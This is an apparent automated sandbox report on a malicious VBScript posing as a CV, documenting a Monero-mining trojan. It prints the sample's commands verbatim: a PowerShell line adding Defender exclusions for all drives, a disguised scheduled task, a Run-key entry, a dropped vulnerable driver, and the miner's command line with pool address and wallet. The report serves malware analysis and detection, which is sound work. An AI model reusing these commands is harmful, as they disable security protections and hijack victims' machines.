        Source: 00000017.00000003.880754735.000001E320A92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000016.00000002.880872368.000001959AF15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 00000013.00000002.992637368.0000018540500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
        Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
        Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
        Source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: Process Memory Space: wscript.exe PID: 4860, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
        Source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: Process Memory Space: wscript.exe PID: 4620, type: MEMORYSTRMatched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: Process Memory Space: wscript.exe PID: 6596, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: Process Memory Space: wscript.exe PID: 6548, type: MEMORYSTRMatched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: Process Memory Space: wscript.exe PID: 6712, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: Process Memory Space: wscript.exe PID: 6860, type: MEMORYSTRMatched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Users\Public\WindowsUpdate\mservice.vbs, type: DROPPEDMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: C:\Users\Public\WindowsUpdate\WinRing0x64.sys, type: DROPPEDMatched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
        Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
        Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
        Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: C:\Users\Public\7g.exeCode function: String function: 003B1E40 appears 118 times
        Source: C:\Users\Public\7g.exeCode function: String function: 0041F1B0 appears 394 times
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B81D9: __EH_prolog,DeviceIoControl,11_2_003B81D9
        Source: C:\Users\Public\7g.exeProcess token adjusted: SecurityJump to behavior
        Source: go.exe.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.993395475414692
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\computer_7Jump to behavior
        Source: WinRing0x64.sys.11.drBinary string: \Device\WinRing0_1_2_0
        Source: classification engineClassification label: mal100.troj.evad.mine.winVBS@29/17@2/3
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
        Source: curriculum_vitae-copie.vbsVirustotal: Detection: 10%
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
        Source: C:\Users\Public\7g.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
        Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
        Source: C:\Users\Public\WindowsUpdate\mservice.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7zJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xmlJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologoJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-titleJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Users\Public\7g.exeCode function: 11_2_003C2962 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_003C2962
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B8FE9 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,11_2_003B8FE9
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like &apos;mservice.exe&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like &apos;mservice.exe&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select name from Win32_process where name like &apos;mservice.exe&apos;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fhh2tk2.a5a.ps1Jump to behavior
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B8F28 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_003B8F28
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
        Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
        Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("wscript.exe", ""C:\Users\user\Desktop\curriculum_v", "", "runas", "1");
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Users\Public\computer_7", "true");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.OpenTextFile("C:\Users\Public\mutex", "2", "true");IShellDispatch6.ShellExecute("cmd.exe", "/c powershell -C "Add-MpPreference -Exc", "", "runas", "0");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");I
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041F1B0 push eax; ret 11_2_0041F1CE
        Source: C:\Users\Public\7g.exeCode function: 11_2_0041F530 push eax; ret 11_2_0041F55E
        Source: C:\Users\Public\7g.exeCode function: 11_2_003EA7A4 GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs,11_2_003EA7A4
        Source: 7zr[1].exe.5.drStatic PE information: section name: .sxdata
        Source: 7g.exe.5.drStatic PE information: section name: .sxdata
        Source: mservice.exe.11.drStatic PE information: section name: _RANDOMX
        Source: mservice.exe.11.drStatic PE information: section name: _TEXT_CN
        Source: mservice.exe.11.drStatic PE information: section name: _TEXT_CN
        Source: mservice.exe.11.drStatic PE information: section name: _RDATA
        Source: go.exe.11.drStatic PE information: real checksum: 0x0 should be: 0x3e524
        Source: 7zr[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9a24c
        Source: mservice.exe.11.drStatic PE information: real checksum: 0x496ae1 should be: 0x48da3c
        Source: 7g.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9a24c
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1

        Persistence and Installation Behavior

        barindex
        Sample is not signed and drops a device driver
        Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to behavior
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\7zr[1].exeJump to dropped file
        Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\mservice.exeJump to dropped file
        Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to dropped file
        Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\ps.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\7g.exeJump to dropped file
        Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\go.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\7g.exeJump to dropped file

        Boot Survival

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
        Drops PE files to the user root directory
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\7g.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media ServiceJump to behavior
        Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media ServiceJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Deletes itself after installation
        Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\curriculum_vitae-copie.vbsJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
